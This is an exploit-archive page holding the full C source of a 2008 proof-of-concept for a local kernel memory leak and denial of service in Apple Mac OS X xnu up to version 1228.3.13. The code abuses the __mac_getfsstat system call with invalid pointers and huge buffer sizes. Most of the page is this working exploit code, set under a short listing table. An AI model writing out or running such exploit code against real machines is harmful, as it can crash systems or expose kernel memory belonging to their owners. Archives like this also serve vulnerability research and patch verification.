Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-Other | Not disclosed | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unspecified | High | Local | 2009-04-08 |
/* xnu-macfsstat-leak.c * * Copyright (c) 2008 by <[email protected]> * * Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS POC * by mu-b - Sun 13 Apr 2008 * * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <sys/mount.h> #include <sys/syscall.h> #include <sys/utsname.h> #include <unistd.h> #define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a) #define LEAK_MACBYTES(a) (sizeof (int)*a) struct __mac_getfsstat { char *buf; char _pad[4]; int bufsize; char __pad[4]; char *mac; char ___pad[4]; int macsize; char ____pad[4]; int flags; char _____pad[4]; }; int main (int argc, char **argv) { struct __mac_getfsstat req; int i, n; printf ("Apple MACOS X xnu <= 1228.3.13 local kernel memory leak/DoS PoC\n" "by: <[email protected]>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); memset (&req, 0, sizeof req); req.buf = (char *) 0xDEADBEEF; req.bufsize = LEAK_BUFBYTES (65536 * 64); req.mac = (char *) 0xDEADBEEF; req.macsize = LEAK_MACBYTES (65536 * 64); for (i = 0; i < 2; i++) { if ((n = syscall (SYS___mac_getfsstat, req.buf, req.bufsize, req.mac, req.macsize, req.flags)) < 0) { fprintf (stderr, "leaked %lu-bytes of kernel memory!\n", LEAK_MACBYTES (65536 * 64)); } } return (EXIT_SUCCESS); }
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.